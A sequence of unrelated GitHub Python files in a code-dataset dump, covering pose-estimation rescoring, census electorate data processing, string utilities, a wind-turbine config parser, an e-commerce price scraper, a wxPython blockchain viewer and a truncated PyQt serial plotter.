PredictOKSmodel(feature)\n scores = scores.cpu().numpy()\n scores[np.isnan(scores)] = 0\n mul_scores = scores*np.array(ori_scores).reshape(scores.shape)\n scores = [np.float(i) for i in list(scores)]\n mul_scores = [np.float(i) for i in list(mul_scores)]\n return mul_scores\n\n\n# Get Rescore training data for RescoreNet\nclass COCORescoreEval(COCOEval):\n def __init__(self, cocoGt=None, cocoDt=None, iouType='segm'):\n COCOEval.__init__(self, cocoGt, cocoDt, iouType)\n self.summary = [['pose', 'pose_heatval', 'oks']]\n \n def evaluateImg(self, imgId, catId, aRng, maxDet):\n '''\n get predicted pose and oks score for single category and image\n change self.summary\n '''\n p = self.params\n if p.useCats:\n gt = self._gts[imgId,catId]\n dt = self._dts[imgId,catId]\n else:\n gt = [_ for cId in p.catIds for _ in self._gts[imgId,cId]]\n dt = [_ for cId in p.catIds for _ in self._dts[imgId,cId]]\n if len(gt) == 0 and len(dt) ==0:\n return None\n \n for g in gt:\n if g['ignore'] or (g['area']aRng[1]):\n g['_ignore'] = 1\n else:\n g['_ignore'] = 0\n\n # sort dt highest score first, sort gt ignore last\n gtind = np.argsort([g['_ignore'] for g in gt], kind='mergesort')\n gt = [gt[i] for i in gtind]\n dtind = np.argsort([-d['score'] for d in dt], kind='mergesort')\n dt = [dt[i] for i in dtind[0:maxDet]]\n # load computed ious\n ious = self.ious[imgId, catId][:, gtind] if len(self.ious[imgId, catId]) > 0 else self.ious[imgId, catId]\n\n gtIg = np.array([g['_ignore'] for g in gt])\n if not len(ious)==0:\n for dind, d in enumerate(dt):\n # information about best match so far (m=-1 -> unmatched)\n iou = 0\n m = -1\n for gind, g in enumerate(gt):\n #if not iscrowd[gind]:\n # continue\n # if dt matched to reg gt, and on ignore gt, stop\n if m>-1 and gtIg[m]==0 and gtIg[gind]==1:\n break\n # continue to next gt unless better match made\n if ious[dind,gind] < iou:\n continue\n # if match successful and best so far, store appropriately\n iou=ious[dind,gind]\n m=gind\n \n dtkeypoint = np.array(d['keypoints']).reshape((17,3))\n self.summary.append([dtkeypoint[:,:2], dtkeypoint[:,2:], iou])\n\n def dumpdataset(self, data_file):\n pickle.dump(self.summary, open(data_file, 'wb'))\n\n\n\nclass CrowdRescoreEval(CrowdposeEval):\n def __init__(self, cocoGt=None, cocoDt=None, iouType='segm'):\n CrowdposeEval.__init__(self, cocoGt, cocoDt, iouType)\n self.summary = [['pose', 'pose_heatval', 'oks']]\n \n def evaluateImg(self, imgId, catId, aRng, maxDet):\n '''\n get predicted pose and oks score for single category and image\n change self.summary\n '''\n p = self.params\n if p.useCats:\n gt = self._gts[imgId, catId]\n dt = self._dts[imgId, catId]\n else:\n gt = [_ for cId in p.catIds for _ in self._gts[imgId, cId]]\n dt = [_ for cId in p.catIds for _ in self._dts[imgId, cId]]\n if len(gt) == 0 and len(dt) == 0:\n return None\n \n for g in gt:\n tmp_area = g['bbox'][2] * g['bbox'][3] * 0.53\n if g['ignore'] or (tmp_area < aRng[0] or tmp_area > aRng[1]):\n g['_ignore'] = 1\n else:\n g['_ignore'] = 0\n\n # sort dt highest score first, sort gt ignore last\n gtind = np.argsort([g['_ignore'] for g in gt], kind='mergesort')\n gt = [gt[i] for i in gtind]\n dtind = np.argsort([-d['score'] for d in dt], kind='mergesort')\n dt = [dt[i] for i in dtind[0:maxDet]]\n # load computed ious\n ious = self.ious[imgId, catId][:, gtind] if len(\n self.ious[imgId, catId]) > 0 else self.ious[imgId, catId]\n\n gtIg = np.array([g['_ignore'] for g in gt])\n if not len(ious)==0:\n for dind, d in enumerate(dt):\n # information about best match so far 
(m=-1 -> unmatched)\n iou = 0\n m = -1\n for gind, g in enumerate(gt):\n #if not iscrowd[gind]:\n # continue\n # if dt matched to reg gt, and on ignore gt, stop\n if m>-1 and gtIg[m]==0 and gtIg[gind]==1:\n break\n # continue to next gt unless better match made\n if ious[dind,gind] < iou:\n continue\n # if match successful and best so far, store appropriately\n iou=ious[dind,gind]\n m=gind\n \n dtkeypoint = np.array(d['keypoints']).reshape((14,3))\n self.summary.append([dtkeypoint[:,:2], dtkeypoint[:,2:], iou])\n\n def dumpdataset(self, data_file):\n pickle.dump(self.summary, open(data_file, 'wb'))\n\n\n\n\n","repo_name":"HRNet/DEKR","sub_path":"lib/utils/rescore.py","file_name":"rescore.py","file_ext":"py","file_size_in_byte":9946,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"52"} +{"seq_id":"12059292900","text":"from collections import namedtuple\nimport json\nimport os.path\n\nfrom openpyxl import load_workbook\nimport requests\n\nDATA_DIR = 'source_files/electorate-profiles-2016'\nJS_FILE = 'src/states.js'\nE_VOTES = {\n 'Alabama': 9, 'Alaska': 3, 'Arizona': 11, 'Arkansas': 6, 'California': 55,\n 'Colorado': 9, 'Connecticut': 7, 'Delaware': 3, 'District of Columbia': 3,\n 'Florida': 29, 'Georgia': 16, 'Hawaii': 4, 'Idaho': 4, 'Illinois': 20,\n 'Indiana': 11, 'Iowa': 6, 'Kansas': 6, 'Kentucky': 8, 'Louisiana': 8,\n 'Maine': 4, 'Maryland': 10, 'Massachusetts': 11, 'Michigan': 16,\n 'Minnesota': 10, 'Mississippi': 6, 'Missouri': 10, 'Montana': 3,\n 'Nebraska': 5, 'Nevada': 6, 'New Hampshire': 4, 'New Jersey': 14,\n 'New Mexico': 5, 'New York': 29, 'North Carolina': 15, 'North Dakota': 3,\n 'Ohio': 18, 'Oklahoma': 7, 'Oregon': 7, 'Pennsylvania': 20,\n 'Rhode Island': 4, 'South Carolina': 9, 'South Dakota': 3,\n 'Tennessee': 11, 'Texas': 38, 'Utah': 6, 'Vermont': 3, 'Virginia': 13,\n 'Washington': 12, 'West Virginia': 5, 'Wisconsin': 10, 'Wyoming': 3,\n}\n\nVOTING_AGE_POP = 'B3'\nEIGHTEEN_TO_TWENTY_NINE = 'B5'\nTHIRTY_TO_FORTY_FOUR = 'B6'\nFORTY_FIVE_TO_SIXTY_FOUR = 'B7'\nSIXTY_FIVE_AND_OVER = 'B8'\nMALE = 'B10'\nFEMALE = 'B10'\nWHITE = 'B13'\nBLACK = 'B14'\nNATIVE_AMERICAN = 'B15'\nASIAN = 'B16'\nPACIFIC_ISLANDER = 'B17'\nOTHER_RACE = 'B18'\nMULTI_RACIAL = 'B19'\nHISPANIC = 'B21'\nNOT_HISPANIC = 'B22'\nWHITE_NOT_HISPANIC = 'B23'\nCITIZENS_25_AND_OLDER = 'B24'\nBACHELORS_OR_HIGHER = 'B25'\nDETERMINED_POVERTY_STATUS = 'B26'\nBELOW_POVERTY_LEVEL = 'B27'\nHOUSEHOLDS = 'B28'\nHUNDRED_K_HOUSEHOLDS = 'B29'\n\ndemos = {\n 'eighteenToTwentyNine': EIGHTEEN_TO_TWENTY_NINE,\n 'thirtyToFortyFour': THIRTY_TO_FORTY_FOUR,\n 'fortyFiveToSixtyFour': FORTY_FIVE_TO_SIXTY_FOUR,\n 'sixtyFiveAndOver': SIXTY_FIVE_AND_OVER,\n 'male': MALE,\n 'female': FEMALE,\n 'white': WHITE,\n 'black': BLACK,\n 'nativeAmerican': NATIVE_AMERICAN,\n 'asian': ASIAN,\n 'pacificIslander': PACIFIC_ISLANDER,\n 'otherRace': OTHER_RACE,\n 'multiRacial': MULTI_RACIAL,\n}\n\n# urls found at: http://www.census.gov/data/tables/time-series/demo/voting-and-registration/electorate-profiles-2016.html\nURL = 'http://www2.census.gov/programs-surveys/demo/tables/voting/{}.xlsx'\n\ndef write_object(f, name, o):\n f.write('export const {} = '.format(name))\n f.write(json.dumps(o, indent=2, sort_keys=True))\n f.write(';\\n')\n\nstates = {}\nfor state, e_votes in E_VOTES.items():\n print(state)\n fn = os.path.join(DATA_DIR, state+'.xlsx')\n\n if not os.path.exists(fn):\n url = URL.format(state.replace(' ', ''))\n r = requests.get(url)\n with open(fn, 'wb') as f:\n f.write(r.content)\n\n wb = 
load_workbook(fn)\n ws = wb[wb.sheetnames[0]]\n\n states[state] = {\n 'name': state,\n 'elVotes': e_votes,\n 'votingAgePop': ws[VOTING_AGE_POP].value,\n 'demos': {}\n }\n for (demo_name, demo_key) in demos.items():\n pop = ws[demo_key].value\n states[state]['demos'][demo_name] = {\n demo_name+'Pop': pop,\n demo_name+'Ratio': pop / states[state]['votingAgePop']\n }\n\nelVotes = sum([state['elVotes'] for state in states.values()])\nvotingAgePop = sum([state['votingAgePop'] for state in states.values()])\nnation = {\n 'name': 'United States',\n 'elVotes': elVotes,\n 'votingAgePop': votingAgePop,\n 'demos': {}\n}\n\nfor state in states.values():\n state['elVoteRatio'] = state['elVotes'] / nation['elVotes']\n state['elVotePercent'] = state['elVoteRatio'] * 100\n state['votes'] = state['elVoteRatio'] * nation['votingAgePop']\n state['votesPerPerson'] = state['votes'] / state['votingAgePop']\n for (demo_name, demo_key) in demos.items():\n state_demo = state['demos'][demo_name]\n state_demo[demo_name+'Votes'] = state_demo[demo_name+'Ratio'] * state['votes']\n\nfor (demo_name, demo_key) in demos.items():\n total_demo_pop = sum([state['demos'][demo_name][demo_name+'Pop'] for state in states.values()])\n total_demo_votes = sum([state['demos'][demo_name][demo_name+'Votes'] for state in states.values()])\n nation['demos'][demo_name] = { 'votesPerPerson': total_demo_votes / total_demo_pop }\n\nwith open(JS_FILE, 'w') as f:\n write_object(f, 'states', states)\n write_object(f, 'nation', nation)\n","repo_name":"ctcutler/electoral","sub_path":"retrieve_and_clean.py","file_name":"retrieve_and_clean.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43814215482","text":"from __future__ import absolute_import, division, print_function, \\\n unicode_literals\nimport re\n\n\n_CAPS_TO_UNDERSCORE_REGEX = re.compile('(.)([A-Z][a-z]+)')\n_NUMBERS_TO_UNDERSCORE_REGEX = re.compile('([a-z0-9])([A-Z])')\n\n\ndef to_underscore(name):\n s1 = _CAPS_TO_UNDERSCORE_REGEX.sub(r'\\1_\\2', name)\n return _NUMBERS_TO_UNDERSCORE_REGEX.sub(r'\\1_\\2', s1).lower()\n\n\ndef from_underscore(name):\n\n if not name:\n return ''\n\n def camelcase_func_it():\n yield 'lower'\n while True:\n yield 'capitalize'\n\n c = camelcase_func_it()\n return ''.join(getattr(x, next(c))() if x else '_' for x in name.split(\"_\"))\n","repo_name":"splitio/python-api","sub_path":"splitapiclient/util/camelcase.py","file_name":"camelcase.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"7102365253","text":"import pandas as pd \nimport sys\n\n\n\nif __name__ == \"__main__\":\n\tinput_file = sys.argv[1]\n\tsent_df = pd.read_csv(input_file)\n\tind_df = pd.read_csv(\"trans_sent_num.csv\", encoding = \"ISO-8859-1\")\n\tind_df = ind_df.rename(columns = {'name':'ID'})\n\tabuse_df = pd.DataFrame(columns = ['ID', 'abuse'])\n\n\tfull = pd.read_csv(\"transcript_fullset.csv\")\n\n\tID = 1\n\tabuse_count = 0\n\tsent_count = 0\n\tfor index, row in sent_df.iterrows():\n\t\tif int(row['ID']) == ID:\n\t\t\tsent_count += 1\n\t\t\tabuse_count += row[\"abuse\"]\n\t\telse:\n\t\t\tabuse_df.set_value(ID, 'abuse', abuse_count/sent_count)\n\t\t\tabuse_df.set_value(ID, 'ID', ID)\n\t\t\tsent_count = 1\n\t\t\tabuse_count = 0\n\t\t\tID = int(row[\"ID\"])\n\n\n\tresult_df = pd.merge(ind_df, abuse_df, on=['ID'])\n\n\tfinal_df = pd.merge(full, result_df, on=['ID'] 
)\n\n\tfinal_df.to_csv('QTA_final_data.csv')","repo_name":"cernhofer/Residential_School_Research","sub_path":"construct_df.py","file_name":"construct_df.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32813826500","text":"import re\nimport numpy as np\nimport string\n\n\nclass Turbine(object):\n \"\"\"\n Tubine class initialization: read the turbine parameters given the turbine name and directory\n\n :param str turbineName: turbine name [turbine name, windTunnel, precursor, noTurbine]\n :param str turbineDir: turbine directory path\n :param str turbineFileName: turbine file name\n \"\"\"\n\n def __init__(self, turbineName, turbineDir, turbineFileName):\n self.turbineName = turbineName\n\n if turbineName == 'windTunnel' or turbineName == 'precursor' or turbineName == 'noTurbine':\n self.turbineFileName = None\n self.turbineDir = turbineDir\n else:\n if turbineDir is None:\n self.turbineDir = \"./\"\n else:\n self.turbineDir = turbineDir\n self.turbinePropDir = self.turbineDir + '/constant/turbineProperties/'\n self.turbineArrayProp = self.turbineDir + '/constant/turbineArrayProperties'\n if turbineFileName is None:\n self.turbineFileName = 'DTU10MW_POLIMI_WTM'\n else:\n self.turbineFileName = turbineFileName\n\n # Read turbine properties\n with open(self.turbinePropDir + self.turbineFileName, \"r\") as turbProp:\n flag = False\n blade_data = []\n numeric_pattern = '[+-]?\\d*\\.\\d+ [+-]?\\d*\\.\\d+ [+-]?\\d*\\.\\d+ [+-]?\\d*\\.\\d+ [+-]?\\d*\\.\\d+ [+-]?\\d+ '\n for line in turbProp:\n if 'TipRad' in line:\n self.rotor_R = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.rotor_D = 2 * self.rotor_R\n elif 'HubRad' in line:\n self.hub_R = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'TowerHt' in line:\n self.tower_H = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'BladeData' in line:\n flag = True\n elif 'TowerData' in line:\n flag = False\n if flag:\n blade_data.append(re.findall(numeric_pattern, line))\n # remove empty elements from blade_data\n blade_data = list(filter(None, blade_data))\n # split sublists\n for i in range(0, len(blade_data)):\n dummy = [el.split() for el in blade_data[i]]\n blade_data[i] = dummy\n # convert to numpy array\n blade_data = np.array(blade_data, dtype=float).reshape(len(blade_data), 6)\n self.blade_r = blade_data[:, 0]\n self.blade_c = blade_data[:, 1]\n self.blade_twist = blade_data[:, 2]\n # self.nacelle_H = self.tower_H+self.offsetNacelle\n\n with open(self.turbineArrayProp, \"r\") as turbArr:\n for line in turbArr:\n if 'baseLocation' in line:\n self.turbX0 = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.turbY0 = float(re.findall('\\d+\\.?\\d*', line)[1])\n self.turbZ0 = float(re.findall('\\d+\\.?\\d*', line)[2])\n self.nacelle_H = self.tower_H + self.turbZ0\n elif 'numBladePoints' in line:\n self.numBladePoints = int(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'numNacellePoints' in line:\n self.numNacellePoints = int(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'numTowerPoints' in line:\n self.numTowerPoints = int(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'bladeForceProjectionType' in line:\n self.bladeForceProjectionType = line.split()[1].translate(\n str.maketrans('', '', string.punctuation))\n elif 'bladeEpsilon' in line:\n self.bladeepsilon0 = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.bladeepsilon1 = float(re.findall('\\d+\\.?\\d*', line)[1])\n self.bladeepsilon2 = float(re.findall('\\d+\\.?\\d*', line)[2])\n elif 
'nacelleEpsilon' in line:\n self.nacelleepsilon0 = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.nacelleepsilon1 = float(re.findall('\\d+\\.?\\d*', line)[1])\n self.nacelleepsilon2 = float(re.findall('\\d+\\.?\\d*', line)[2])\n elif 'towerEpsilon' in line:\n self.towerepsilon0 = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.towerepsilon1 = float(re.findall('\\d+\\.?\\d*', line)[1])\n self.towerepsilon2 = float(re.findall('\\d+\\.?\\d*', line)[2])\n\n with open(self.turbineDir + '/setUp', \"r\") as setUp:\n for line in setUp:\n if 'xMin' in line:\n self.xMin = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'yMin' in line:\n self.yMin = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'zMin' in line:\n self.zMin = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'xMax' in line:\n self.xMax = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'yMax' in line:\n self.yMax = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'zMax' in line:\n self.zMax = float(re.findall('\\d+\\.?\\d*', line)[0])\n elif 'U0Mag' in line:\n self.U0Mag = float(re.findall('\\d+\\.?\\d*', line)[0])\n self.XDomain = self.xMax - self.xMin\n self.YDomain = self.yMax - self.yMin\n self.ZDomain = self.zMax - self.zMin\n\n","repo_name":"GiordiR/pySOWFA","sub_path":"pySOWFA/Turbine.py","file_name":"Turbine.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6625874787","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom lxml import html\nfrom urllib import parse\nimport math\nimport json\n\n\nclass Scraper:\n\n def __init__(self, URL):\n self.current_price = None\n self.actual_price = None\n self.deal_price = None\n self.discount = None\n self.URL = URL\n self.HEADERS = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'\n }\n\n def get_url_from_user(self):\n try:\n parsed_url = parse.urlsplit(self.URL)\n response = requests.get(self.URL, headers=self.HEADERS)\n html_response = BeautifulSoup(response.content, 'lxml')\n if parsed_url.netloc == 'www.amazon.com' or parsed_url.netloc == 'www.amazon.in':\n return self.scrap_amazon(html_response)\n elif parsed_url.netloc == 'www.flipkart.com':\n return self.scrap_flipkart(html_response)\n elif parsed_url.netloc == 'www.snapdeal.com':\n return self.scrap_snapdeal(html_response)\n else:\n print('None of the above')\n except AttributeError as error:\n print(error)\n\n def scrap_amazon(self, html_response):\n product_image = None\n # get product image\n try:\n product_image = html_response.select_one('img#landingImage')[\n 'data-a-dynamic-image']\n product_image = list(json.loads(product_image).keys())[0]\n except:\n product_image = 'NA'\n # get product name\n try:\n product_name = html_response.select_one('span#productTitle').get_text().strip()\n except:\n product_name = 'NA'\n # get actual price\n try:\n self.actual_price = html_response.select_one(\n 'span.priceBlockStrikePriceString.a-text-strike').get_text()\n self.actual_price = float(self.actual_price.strip().replace(\n '₹', '').replace(',', '').replace('$', ''))\n except AttributeError as error:\n self.actual_price = 'NA'\n print(self.actual_price)\n # get current price\n try:\n self.current_price = html_response.select_one(\n 'span#priceblock_ourprice').get_text()\n self.current_price = float(self.current_price.strip().replace(\n '₹', '').replace(',', '').replace('$', ''))\n except AttributeError as error:\n self.current_price = 
'NA'\n # get deal price\n try:\n self.deal_price = html_response.select_one(\n 'span#priceblock_dealprice').get_text()\n self.deal_price = float(self.deal_price.strip().replace(\n '₹', '').replace(',', '').replace('$', ''))\n except AttributeError as error:\n self.deal_price = 'NA'\n if self.current_price == 'NA' and self.deal_price != 'NA':\n self.current_price = self.deal_price\n elif self.current_price == 'NA' and self.deal_price == 'NA':\n self.current_price = self.actual_price\n elif self.actual_price == 'NA' and self.current_price != 'NA':\n self.actual_price = self.current_price\n discount = math.floor(\n ((self.actual_price - self.current_price) / self.actual_price) * 100)\n return {\n 'product_image': product_image,\n 'product_name': product_name,\n 'actual_price': self.actual_price,\n 'current_price': self.current_price,\n 'discount': discount\n }\n\n def scrap_flipkart(self, html_response):\n # get produc image\n product_image = 'https://www.wileyindia.com/pub/static/frontend/Magento/luma/en_US/images/Flipkart.jpg'\n # get product image\n try:\n product_name = html_response.select_one('span._35KyD6').get_text().strip()\n except:\n product_name = 'NA'\n # get actual price\n try:\n self.actual_price = html_response.select_one(\n 'div._3auQ3N._1POkHg').get_text().strip()\n self.actual_price = float(self.actual_price.replace('₹', '').replace(',', ''))\n except AttributeError as error:\n self.actual_price = 'NA'\n # get current price\n try:\n self.current_price = html_response.select_one(\n 'div._1vC4OE._3qQ9m1').get_text().strip()\n self.current_price = float(self.current_price.replace('₹', '').replace(',', ''))\n except AttributeError as error:\n self.current_price = 'NA'\n if self.actual_price == 'NA' and self.current_price != 'NA':\n self.actual_price = self.current_price\n elif self.actual_price != 'NA' and self.current_price == 'NA':\n self.current_price = self.actual_price\n discount = math.floor(((self.actual_price - self.current_price)/self.actual_price) * 100)\n return {\n 'product_image': product_image,\n 'product_name': product_name,\n 'actual_price': self.actual_price,\n 'current_price': self.current_price,\n 'discount': discount\n }\n\n def scrap_snapdeal(self, html_response):\n # get product image\n try:\n img_container = html_response.select_one('ul#bx-slider-left-image-panel')\n product_image = img_container.select('img.cloudzoom')[0]['src']\n except:\n product_image = 'NA'\n # get product name\n try:\n product_name = html_response.select_one('h1.pdp-e-i-head').get_text().strip()\n except:\n product_name = 'NA'\n # get actual price\n try:\n self.actual_price = html_response.select_one(\n 'div.pdpCutPrice').get_text().strip()\n self.actual_price = float(self.actual_price[9:15].replace(',', ''))\n except AttributeError as error:\n self.actual_price = 'NA'\n # get current price\n try:\n for sub_div in html_response.select('span.pdp-final-price'):\n self.current_price = sub_div.find(\n 'span', {'class': 'payBlkBig'}).get_text().strip()\n self.current_price = float(self.current_price)\n except AttributeError as error:\n self.current_price = 'NA'\n if self.actual_price == 'NA' and self.current_price != 'NA':\n self.actual_price = self.current_price\n elif self.actual_price != 'NA' and self.current_price == 'NA':\n self.current_price = self.actual_price\n discount = math.floor(((self.actual_price - self.current_price)/self.actual_price) * 100)\n return {\n 'product_image': product_image,\n 'product_name': product_name,\n 'actual_price': self.actual_price,\n 'current_price': 
self.current_price,\n            'discount': discount\n        }\n\n\nif __name__ == '__main__':\n    # Scraper.__init__ requires a target URL, so prompt for one when run directly\n    scraper = Scraper(input('Enter a product URL: '))\n    scraper.get_url_from_user()\n","repo_name":"bhargavkuchipudi0/web_scraper","sub_path":"scrapers/scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":7039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"41393471026","text":"import wx\nimport wx.lib.agw.hyperlink as hyperlink\n\nclass BlockView(wx.Panel):\n    def __init__(self, parent=None):\n        wx.Panel.__init__(self, parent)\n        #Block\n        txtctrl_style = wx.TE_READONLY|wx.BORDER_SIMPLE #|wx.TE_RIGHT\n        txtctrl_color = (196,196,196)\n        font_large = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)\n        font_mono = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.NORMAL)\n        self.block_label = wx.StaticText(self, -1, \"Block\", size=(350,30))\n        self.block_label.SetFont(font_large)\n        self.hash_label = wx.StaticText(self, -1, \"Hash:\")\n        self.hash_linkctrl = hyperlink.HyperLinkCtrl(self, wx.ID_ANY, \"\")\n        self.previous_block_label = wx.StaticText(self, -1, \"Previous block:\")\n        self.previous_block_linkctrl = hyperlink.HyperLinkCtrl(self, wx.ID_ANY, \"\")\n        self.next_block_label = wx.StaticText(self, -1, \"Next block:\")\n        self.next_block_linkctrl = hyperlink.HyperLinkCtrl(self, wx.ID_ANY, \"\")\n        self.time_label = wx.StaticText(self, -1, \"Time:\")\n        self.time_textctrl = wx.TextCtrl(self, -1, \"\", size=(150,-1), style=txtctrl_style)\n        self.time_textctrl.SetBackgroundColour(txtctrl_color)\n        self.time_textctrl.SetFont(font_mono)\n        self.difficulty_label = wx.StaticText(self, -1, \"Difficulty:\")\n        self.difficulty_textctrl = wx.TextCtrl(self, -1, \"\", size=(150,-1), style=txtctrl_style)\n        self.difficulty_textctrl.SetBackgroundColour(txtctrl_color)\n        self.difficulty_textctrl.SetFont(font_mono)\n        self.merkle_label = wx.StaticText(self, -1, \"Merkle root:\")\n        self.merkle_textctrl = wx.TextCtrl(self, -1, \"\", size=(390,-1), style=txtctrl_style)\n        self.merkle_textctrl.SetBackgroundColour(txtctrl_color)\n        self.merkle_textctrl.SetFont(font_mono)\n        self.nonce_label = wx.StaticText(self, -1, \"Nonce:\")\n        self.nonce_textctrl = wx.TextCtrl(self, -1, \"\", size=(150,-1), style=txtctrl_style)\n        self.nonce_textctrl.SetBackgroundColour(txtctrl_color)\n        self.nonce_textctrl.SetFont(font_mono)\n        #Transactions\n        self.transactions_label = wx.StaticText(self, -1, \"Transactions\", size=(350,-1))\n        self.transactions_label.SetFont(font_large)\n\n        self.transactions_listctrl = wx.ListCtrl(self, style=wx.LC_REPORT, size=(400,100))\n\n        self.transactions_listctrl.InsertColumn(0, \"Transaction\")\n        self.transactions_listctrl.SetColumnWidth(0, 240)\n        self.transactions_listctrl.InsertColumn(1, \"Amount\")\n        self.transactions_listctrl.InsertColumn(2, \"Fee\")\n        self.transactions_listctrl.InsertColumn(3, \"Type\")\n\n        self.sizer = wx.BoxSizer(wx.VERTICAL)\n        formsizer = wx.FlexGridSizer(7, 2, vgap=2)\n        formsizer.Add(self.hash_label, 0)\n        formsizer.Add(self.hash_linkctrl, 0, wx.EXPAND)\n        formsizer.Add(self.previous_block_label, 0)\n        formsizer.Add(self.previous_block_linkctrl, 0, wx.EXPAND)\n        formsizer.Add(self.next_block_label)\n        formsizer.Add(self.next_block_linkctrl, 0, wx.EXPAND)\n        formsizer.Add(self.time_label, 0)\n        formsizer.Add(self.time_textctrl, 0)\n        formsizer.Add(self.difficulty_label, 0)\n        formsizer.Add(self.difficulty_textctrl, 0)\n        formsizer.Add(self.merkle_label, 0)\n        formsizer.Add(self.merkle_textctrl, 0, wx.EXPAND)\n        formsizer.Add(self.nonce_label, 0)\n        formsizer.Add(self.nonce_textctrl, 0)\n        
formsizer.AddGrowableCol(1)\n \n \"\"\"\n tx_table = wx.FlexGridSizer(20, 5, vgap=2)\n tx_table.Add(self.thlabel_txtable)\n tx_table.Add(self.thlabel_amount)\n tx_table.Add(self.thlabel_fee)\n tx_table.Add(self.thlabel_from)\n tx_table.Add(self.thlabel_to)\n tx_table.AddGrowableCol(0)\n tx_table.AddGrowableCol(1)\n tx_table.AddGrowableCol(2)\n tx_table.AddGrowableCol(3)\n tx_table.AddGrowableCol(4)\"\"\"\n \n self.sizer.Add(self.block_label)\n \n self.sizer.Add(formsizer, 0, wx.EXPAND)\n self.sizer.Add(self.transactions_label)\n self.sizer.Add(self.transactions_listctrl, 1, wx.EXPAND)\n \n \n self.bestsize = (600,25)\n self.SetSize(self.GetBestSize())\n self.SetSizer(self.sizer)\n #Events\n self.hash_linkctrl.Bind(hyperlink.EVT_HYPERLINK_LEFT, self.on_click_hash)\n self.hash_linkctrl.AutoBrowse(False)\n self.previous_block_linkctrl.Bind(hyperlink.EVT_HYPERLINK_LEFT, self.on_click_prev)\n self.previous_block_linkctrl.AutoBrowse(False)\n self.next_block_linkctrl.Bind(hyperlink.EVT_HYPERLINK_LEFT, self.on_click_next)\n self.next_block_linkctrl.AutoBrowse(False)\n \n def on_click_hash(self, event):\n wx.MessageBox(\"You clicked hash\")\n\n def on_click_prev(self, event):\n wx.MessageBox(\"You clicked prev\")\n\n def on_click_next(self, event):\n wx.MessageBox(\"You clicked next\")\n\n\n def set_hash(self, str):\n self.hash_linkctrl.SetLabel(str)\n\n def set_previous_block(self, str):\n self.previous_block_linkctrl.SetLabel(str)\n\n def set_next_block(self, str):\n self.next_block_linkctrl.SetLabel(str)\n\n def set_time(self, str):\n self.time_textctrl.SetValue(str)\n\n def set_difficulty(self, str):\n self.difficulty_textctrl.SetValue(str)\n\n def set_merkle(self, str):\n self.merkle_textctrl.SetValue(str)\n\n def set_nonce(self, str):\n self.nonce_textctrl.SetValue(str)\n\n def add_transaction(self, hash, amount, fee, type):\n index = self.transactions_listctrl.InsertStringItem(self.transactions_listctrl.GetItemCount(),hash)\n self.transactions_listctrl.SetStringItem(index, 1, amount)\n self.transactions_listctrl.SetStringItem(index, 2, fee)\n self.transactions_listctrl.SetStringItem(index, 3, type)\n \n \nif __name__ == '__main__':\n app = wx.App(False)\n frame = wx.Frame(None, size=(500, 600))\n BlockView(frame)\n\n\n frame.Show()\n app.MainLoop()","repo_name":"sirk390/coinpy","sub_path":"coinpy-client/src/coinpy_client/view/blockchain/block_view.py","file_name":"block_view.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"24265156962","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nfrom pyqtgraph import PlotWidget, plot\nfrom PyQt5.Qt import Qt\nimport pyqtgraph as pg\nimport sys \nimport os\nfrom random import randint\nimport serial.tools.list_ports\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtGui,QtCore\nimport re\n\nports = serial.tools.list_ports.comports()\nserialInst = serial.Serial()\nportsList = []\n\nfor onePort in ports:\n portsList.append(str(onePort))\n print(str(onePort))\n\nval = input(\"Select Port: COM\")\n\nfor x in range(0,len(portsList)):\n if portsList[x].startswith(\"COM\" + str(val)):\n portVar = \"COM\" + str(val)\n print(portVar)\n\nserialInst.baudrate = 115200\nserialInst.port = portVar\nserialInst.open()\n\nclass MainWindow(QtWidgets.QMainWindow):\n\n rotation_sensor=0\n light_sensor=0\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n \n self.widget = QWidget()\n layout = QGridLayout()\n 
